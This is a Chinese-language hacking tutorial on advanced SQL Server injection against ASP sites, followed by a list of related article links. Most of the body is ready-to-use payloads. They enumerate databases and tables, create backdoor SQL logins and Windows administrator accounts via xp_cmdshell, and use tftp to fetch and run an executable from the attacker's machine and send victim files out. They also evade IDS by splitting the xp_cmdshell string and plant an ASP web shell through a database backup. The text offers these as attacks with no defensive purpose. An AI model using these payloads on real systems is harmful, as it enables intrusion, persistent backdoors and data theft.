桂林老兵的SQLSERVER高级注入技巧
前言:即是高级技巧,其它基本的注入方法就不详述了。
看不懂可查本站的注入基础文章。
为了更好的用好注入,建议大家看看本站的sql语法相关文章
[获取全部数据库名]
select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
select top 1 name from 数据库名.dbo.sysobjects where xtype='u' and status>0 and name not in('table')
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
select top 1 数据库名.dbo.col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件]
通过sqlserver注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是sysadmin组]
news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加数据库用户用户test,密码为test
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密码,则用这句(将test的密码改为123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test加到sysadmin组,这个组的成员可执行任何操作
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //添加系统用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //将系统用户test提升为管理员
这样,你在他的数据库和系统内都留下了test管理员账号了
下面是如何从你的服器下载文件file.exe后运行它[前提是你必须将你的电脑设为tftp服务器,将69端口打开]
id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的ip get file.exe';--
然后运行这个文件:
id=2; exec master.dbo.xp_cmdshell 'file.exe';--
下载服务器的文件file2.doc到本地tftp服务器[文件必须存在]:
id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的ip put file2.doc';--
绕过ids的检测[使用变量]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
新加的:
建一个表。只有一个字段,类型为image,将asp内容写入。导出数据库为文件
backup database dbname to disk='d:\web\db.asp';
报错得到系统操作系统和数据库系统版本号
id=2 and 1<>(select @@version);
下一篇:内存故障巧排除
↓相关文章:
- · 内存故障巧排除
- · 网上免费索取过刊
- · 常用黑客工具的使用方法集锦
- · 一种很奇特的入侵主机的方法
- · Unix黑客初学者指导
- · 国家代码
- · Gmail 小技巧
- · Linux文件系统被破坏时的处理方法
- · SQL SERVER 与ACCESS、EXCEL的数据转换
- · LJez System文章系统漏洞
- · 一次艰苦的6个小时的渗透过程
- · 批量查询域名工具Domain Inspect 1.5 汉化注册版
- · 中文搜索引擎技术揭密:网络蜘蛛
- · 关于SWF文件格式分析及SWFEXE的经验积累
- · HThost免费空间(PHP+MYSQL+邮局+无限子站+统计系统)申请与管理攻略
- · hthost的一条龙服务
- · 在肉机上开个隐藏的个人主页
- · QQ2005新春贺岁版应用全攻略
- · Php+Mysql注入专题
- · 识别WEB应用组件
- · 计算机密码破解实用手册
- · 免费拥有网易收费服务
- · SQL 语法参考手册
- · 黑客常用术语
- · 玩QQ宠物的八大秘笈绝招
- · 什么是Trackback
- · 汉化软件教程
- · 解决Explorer.exe 在 Windows XP 中反复意外退出
- · 命令行方式使用FTP实战练习
- · MP4背景知识
- · 完全BIOS优化
- · ADSL入侵
- · Python学习资料
- · 网站LOGO设计规范的思考
- · 美工LOGO设计进阶
- · 防止入侵 两步修改XP远程管理默认端口
- · 解决安装XP SP2 后无法显示验证码的问题
- · 如何设计LOGO-字母变形标志教程
- · 关于Java的一切 : 工具, 类库, 框架
- · 预防SQL注入漏洞函数
- · SQL注入漏洞全接触
- · XREA空间数据库操作的相关更新
- · ADSL知识合集
- · Windows2000绝版安全
- · QQ号码的基本知识
- · 86件Firefox浏览器能而IE不能做的事
- · 解决国内不能正常访问GMAIL的方法
- · Label标签创新使用,1G容量轻松管理
- · cs1.5命令
- · 巧用DOS命令上传文件
- · 动态IP變固定ip的詳細步驟
- · Window 服务全攻略大全
- · Discuz! 2.5F cookie未过滤漏洞
- · 来自MSN官方网站的使用技巧集锦
- · WinXPSP2激活精彩问答
- · 修改MD5加密 提高网站安全
- · MSSQL注入攻击服务器与防护
- · TCP端口的作用、漏洞和操作建议
- · 国内10大bt站点
- · 用命令检查电脑是否被安装木马